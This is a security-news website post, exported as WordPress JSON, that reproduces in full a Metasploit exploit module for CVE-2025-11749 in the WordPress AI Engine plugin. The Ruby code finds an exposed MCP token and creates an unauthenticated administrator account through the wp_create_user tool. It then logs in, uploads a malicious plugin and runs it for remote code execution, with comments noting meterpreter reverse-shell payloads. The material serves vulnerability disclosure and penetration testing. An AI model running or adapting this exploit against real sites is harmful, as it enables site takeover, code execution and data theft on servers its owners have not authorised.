{"id":28651,"date":"2025-12-04T13:42:15","date_gmt":"2025-12-04T13:42:15","guid":{"rendered":"http:\/\/localhost\/?p=28651"},"modified":"2025-12-04T13:42:15","modified_gmt":"2025-12-04T13:42:15","slug":"wordpress-ai-engine-plugin-mcp-unauthenticated-admin-creation-to-rce","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28651","title":{"rendered":"WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-04T19:04:42&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin versions use exploit\/multi\/http\/wpaienginemcprce msf exploitwpaienginemcprce show targets &#8230;targets&#8230; msf exploitwpaienginemcprce set TARGET msf&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-04T18:55:51&#8243;,&#8221;modified&#8221;:&#8221;2025-12-04T18:55:51&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-11749&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n  Rank = ExcellentRanking\\n\\n  include Msf::Payload::Php\\n  include Msf::Exploit::FileDropper\\n  include Msf::Exploit::Remote::HttpClient\\n  include Msf::Exploit::Remote::HTTP::Wordpress\\n\\n  prepend Msf::Exploit::Remote::AutoCheck\\n\\n  ERROR_PATTERN = \/already exists|username.*taken|user.*exists\/i\\n  SUCCESS_PATTERN = \/User (?:created|updated|#\\\\d+ updated)|success|created\/i\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin\\n          (versions \\u003c= 3.1.3). The vulnerability allows an attacker to create an administrator account\\n          via the MCP (Model Context Protocol) endpoint without authentication. The module supports\\n          both `\/wp-json\/mcp\/v1\/` and `\/?rest_route=\/mcp\/v1\/` endpoints. Once an administrator\\n          account is created, the module uploads and executes a malicious plugin to achieve remote\\n          code execution (RCE).\\n        },\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Emiliano Versini&#8217;,                             # Vulnerability discovery\\n          &#8216;Khaled Alenazi (Nxploited)&#8217;,                   # PoC\\n          &#8216;Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e&#8217;,  # Metasploit module\\n          &#8216;dledda-r7&#8217;                                     # Reviewer\\n        ],\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2025-11749&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/Nxploited\/CVE-2025-11749&#8217;]\\n        ],\\n        &#8216;Platform&#8217; =\\u003e %w[php unix linux win],\\n        &#8216;Arch&#8217; =\\u003e [ARCH_PHP, ARCH_CMD],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-11-04&#8217;,\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;Privileged&#8217; =\\u003e false,\\n        &#8216;Targets&#8217; =\\u003e [\\n          [\\n            &#8216;PHP In-Memory&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e &#8216;php&#8217;,\\n              &#8216;Arch&#8217; =\\u003e ARCH_PHP\\n              # tested with php\/meterpreter\/reverse_tcp\\n            }\\n          ],\\n          [\\n            &#8216;Unix\/Linux Command Shell&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e %w[unix linux],\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD\\n              # tested with cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp\\n            }\\n          ],\\n          [\\n            &#8216;Windows Command Shell&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD\\n              # tested with cmd\/windows\/http\/x64\/meterpreter\/reverse_tcp\\n            }\\n          ]\\n        ],\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n        }\\n      )\\n    )\\n\\n    register_options(\\n      [\\n        OptString.new(&#8216;USERNAME&#8217;, [true, &#8216;Username to create&#8217;, Faker::Internet.username]),\\n        OptString.new(&#8216;PASSWORD&#8217;, [true, &#8216;Password for the new user&#8217;, Faker::Internet.password(min_length: 8)]),\\n        OptString.new(&#8216;EMAIL&#8217;, [true, &#8216;Email for the new user&#8217;, Faker::Internet.email])\\n      ]\\n    )\\n  end\\n\\n  def check\\n    return CheckCode::Unknown unless wordpress_and_online?\\n\\n    plugin_check = check_plugin_version_from_readme(&#8216;ai-engine&#8217;, &#8216;3.1.4&#8217;)\\n    return plugin_check if plugin_check == CheckCode::Safe\\n\\n    @token = find_token\\n    return CheckCode::Safe(&#8216;MCP token not found. Plugin may be patched or not configured.&#8217;) unless @token\\n\\n    CheckCode::Appears\\n  end\\n\\n  def exploit\\n    fail_with(Failure::NotFound, &#8216;The target does not appear to be using WordPress&#8217;) unless wordpress_and_online?\\n\\n    @token ||= find_token\\n    fail_with(Failure::NotVulnerable, &#8216;MCP token not found. Plugin may be patched or not configured.&#8217;) unless @token\\n\\n    username = datastore[&#8216;USERNAME&#8217;]\\n    password = datastore[&#8216;PASSWORD&#8217;]\\n    email = datastore[&#8216;EMAIL&#8217;]\\n\\n    result = create_admin_user(@token, username, password, email)\\n    fail_with(Failure::UnexpectedReply, &#8216;Failed to create administrator account.&#8217;) if result == false\\n\\n    if result == :user_exists\\n      print_warning(&#8216;User already exists, updating password and continuing exploitation&#8230;&#8217;)\\n      update_user_password(@token, username, password)\\n    end\\n\\n    admin_cookie = wordpress_login(username, password)\\n    unless admin_cookie\\n      error_msg = &#8216;Failed to log in to WordPress admin.&#8217;\\n      error_msg += &#8216; User may exist with a different password.&#8217; if result == :user_exists\\n      fail_with(Failure::UnexpectedReply, error_msg)\\n    end\\n\\n    upload_and_execute_payload(admin_cookie)\\n  end\\n\\n  # REST API helpers\\n  def send_rest_request(rest_path, method: &#8216;GET&#8217;, data: nil)\\n    opts = {\\n      &#8216;method&#8217; =\\u003e method,\\n      &#8216;ctype&#8217; =\\u003e method == &#8216;POST&#8217; ? &#8216;application\/json&#8217; : nil,\\n      &#8216;data&#8217; =\\u003e data\\n    }\\n\\n    uri = normalize_uri(target_uri.path, &#8216;wp-json&#8217;, rest_path)\\n    res = send_request_cgi(opts.merge(&#8216;uri&#8217; =\\u003e uri))\\n    return res if res\\u0026.code == 200\\n\\n    vars_get = { &#8216;rest_route&#8217; =\\u003e rest_path }\\n    send_request_cgi(opts.merge(&#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path), &#8216;vars_get&#8217; =\\u003e vars_get))\\n  end\\n\\n  def find_token\\n    extract_token_from_routes(send_rest_request(&#8216;\/&#8217;))\\n  end\\n\\n  def extract_token_from_routes(res)\\n    return nil unless res\\u0026.code == 200\\n\\n    routes = res.get_json_document\\u0026.dig(&#8216;routes&#8217;)\\n    return nil unless routes.is_a?(Hash)\\n\\n    mcp_regex = %r{^\/mcp\/v1\/([^\/]+)\/sse$}\\n    routes.each_key do |route|\\n      next unless route.is_a?(String)\\n\\n      match = route.match(mcp_regex)\\n      next unless match\\n\\n      token = match[1]\\n      next if token == &#8216;sse&#8217; || token.empty?\\n\\n      return token\\n    end\\n    nil\\n  end\\n\\n  # MCP API helpers\\n  def send_mcp_request(token, segments, method: &#8216;GET&#8217;, data: nil)\\n    path = \\&#8221;\/mcp\/v1\/#{token}\/#{segments.join(&#8216;\/&#8217;)}\\&#8221;\\n    send_rest_request(path, method: method, data: data)\\n  end\\n\\n  def build_mcp_payload(tool_name, arguments)\\n    {\\n      &#8216;jsonrpc&#8217; =\\u003e &#8216;2.0&#8217;,\\n      &#8216;id&#8217; =\\u003e rand(1..999_999),\\n      &#8216;method&#8217; =\\u003e &#8216;tools\/call&#8217;,\\n      &#8216;params&#8217; =\\u003e {\\n        &#8216;name&#8217; =\\u003e tool_name,\\n        &#8216;arguments&#8217; =\\u003e arguments\\n      }\\n    }.to_json\\n  end\\n\\n  def send_mcp_tool_call_raw(token, tool_name, arguments)\\n    payload = build_mcp_payload(tool_name, arguments)\\n    res = send_mcp_request(token, [&#8216;sse&#8217;], method: &#8216;POST&#8217;, data: payload)\\n    return nil unless res\\n    return nil unless res.code == 200\\n\\n    json_response = res.get_json_document\\n    return nil unless json_response.is_a?(Hash)\\n\\n    json_response.dig(&#8216;result&#8217;, &#8216;content&#8217;)\\n  end\\n\\n  def send_mcp_tool_call(token, tool_name, arguments)\\n    payload = build_mcp_payload(tool_name, arguments)\\n    res = send_mcp_request(token, [&#8216;sse&#8217;], method: &#8216;POST&#8217;, data: payload)\\n    return false unless res\\n    return true if res.code == 204\\n    return false unless res.code == 200\\n\\n    json_response = res.get_json_document\\n    return false unless json_response.is_a?(Hash)\\n\\n    error = json_response[&#8216;error&#8217;]\\n    return :user_exists if error.is_a?(Hash) \\u0026\\u0026 error[&#8216;code&#8217;] == &#8216;existing_user_login&#8217;\\n    return :user_exists if error.is_a?(Hash) \\u0026\\u0026 error[&#8216;message&#8217;]\\u0026.match?(ERROR_PATTERN)\\n\\n    result_content = json_response.dig(&#8216;result&#8217;, &#8216;content&#8217;)\\n    return true if result_content\\u0026.any? { |item| item[&#8216;text&#8217;]\\u0026.match?(SUCCESS_PATTERN) }\\n\\n    body = res.body.to_s\\n    return :user_exists if body =~ ERROR_PATTERN\\n    return true if body =~ SUCCESS_PATTERN\\n\\n    false\\n  end\\n\\n  # User management\\n  def get_user_id(token, username)\\n    arguments = {\\n      &#8216;search&#8217; =\\u003e username,\\n      &#8216;search_columns&#8217; =\\u003e [&#8216;user_login&#8217;]\\n    }\\n\\n    result_content = send_mcp_tool_call_raw(token, &#8216;wp_get_users&#8217;, arguments)\\n    return nil unless result_content.is_a?(Array)\\n\\n    result_content.each do |item|\\n      next unless item.is_a?(Hash) \\u0026\\u0026 item[&#8216;text&#8217;]\\n\\n      text = item[&#8216;text&#8217;].to_s\\n      begin\\n        users = JSON.parse(text)\\n        users = [users] unless users.is_a?(Array)\\n        user = users.find { |u| u[&#8216;user_login&#8217;] == username }\\n        return user[&#8216;ID&#8217;].to_i if user \\u0026\\u0026 user[&#8216;ID&#8217;]\\n      rescue JSON::ParserError\\n        next\\n      end\\n    end\\n\\n    nil\\n  end\\n\\n  def create_admin_user(token, username, password, email)\\n    arguments = {\\n      &#8216;user_login&#8217; =\\u003e username,\\n      &#8216;user_email&#8217; =\\u003e email,\\n      &#8216;user_pass&#8217; =\\u003e password,\\n      &#8216;role&#8217; =\\u003e &#8216;administrator&#8217;\\n    }\\n    send_mcp_tool_call(token, &#8216;wp_create_user&#8217;, arguments)\\n  end\\n\\n  def update_user_password(token, username, password)\\n    user_id = get_user_id(token, username)\\n    return false unless user_id\\n\\n    arguments = {\\n      &#8216;ID&#8217; =\\u003e user_id,\\n      &#8216;fields&#8217; =\\u003e {\\n        &#8216;user_pass&#8217; =\\u003e password\\n      }\\n    }\\n    result = send_mcp_tool_call(token, &#8216;wp_update_user&#8217;, arguments)\\n    print_warning(&#8216;Password update may have failed, attempting login anyway&#8230;&#8217;) unless result\\n    result\\n  end\\n\\n  # Payload execution\\n  def upload_and_execute_payload(admin_cookie)\\n    plugin_name = \\&#8221;wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}\\&#8221;\\n    payload_name = \\&#8221;ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}\\&#8221;\\n\\n    zip = generate_plugin(plugin_name, payload_name)\\n    fail_with(Failure::UnexpectedReply, &#8216;Failed to upload the payload&#8217;) unless wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)\\n\\n    register_files_for_cleanup(\\&#8221;#{payload_name}.php\\&#8221;, \\&#8221;#{plugin_name}.php\\&#8221;)\\n    register_dir_for_cleanup(\\&#8221;..\/#{plugin_name}\\&#8221;)\\n    payload_file = \\&#8221;#{payload_name}.php\\&#8221;\\n    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)\\n    send_request_cgi(&#8216;uri&#8217; =\\u003e payload_uri, &#8216;method&#8217; =\\u003e &#8216;GET&#8217;)\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/wp_ai_engine_mcp_rce.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/wp_ai_engine_mcp_rce\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-04T19:04:42&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin versions use exploit\/multi\/http\/wpaienginemcprce msf exploitwpaienginemcprce show targets &#8230;targets&#8230; msf exploitwpaienginemcprce set TARGET msf&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-04T18:55:51&#8243;,&#8221;modified&#8221;:&#8221;2025-12-04T18:55:51&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;WordPress&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-28651","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28651\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-04T19:04:42&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin versions use exploit\/multi\/http\/wpaienginemcprce msf exploitwpaienginemcprce show targets &#8230;targets&#8230; msf exploitwpaienginemcprce set TARGET msf&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-04T18:55:51&#8243;,&#8221;modified&#8221;:&#8221;2025-12-04T18:55:51&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;WordPress...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28651\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-04T13:42:15+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28651#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28651\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE-\",\"datePublished\":\"2025-12-04T13:42:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28651\"},\"wordCount\":1712,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28651#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28651\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28651\",\"name\":\"WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-04T13:42:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28651#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28651\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28651#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=28651","og_locale":"en_US","og_type":"article","og_title":"WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-04T19:04:42&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin versions use exploit\/multi\/http\/wpaienginemcprce msf exploitwpaienginemcprce show targets &#8230;targets&#8230; msf exploitwpaienginemcprce set TARGET msf&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-04T18:55:51&#8243;,&#8221;modified&#8221;:&#8221;2025-12-04T18:55:51&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;WordPress...","og_url":"https:\/\/zero.redgem.net\/?p=28651","og_site_name":"zero redgem","article_published_time":"2025-12-04T13:42:15+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=28651#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=28651"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE-","datePublished":"2025-12-04T13:42:15+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=28651"},"wordCount":1712,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=28651#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=28651","url":"https:\/\/zero.redgem.net\/?p=28651","name":"WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-04T13:42:15+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=28651#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=28651"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=28651#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_AI_ENGINE_MCP_RCE-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28651","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28651"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28651\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedi